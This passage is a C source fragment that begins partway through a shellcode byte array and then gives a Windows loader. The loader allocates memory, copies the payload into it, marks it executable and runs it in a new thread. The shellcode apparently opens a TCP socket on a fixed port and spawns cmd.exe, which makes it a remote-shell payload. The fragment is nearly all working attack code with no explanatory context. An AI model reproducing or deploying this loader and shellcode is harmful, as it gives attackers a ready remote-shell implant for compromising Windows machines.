"\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
"\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
"\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
"\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
"\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
"\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
"\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
"\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
"\x04";
unsigned int payload_len = 415;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec_mem, payload, payload_len);
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("Shellcode Length: %d\n", strlen(payload));
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}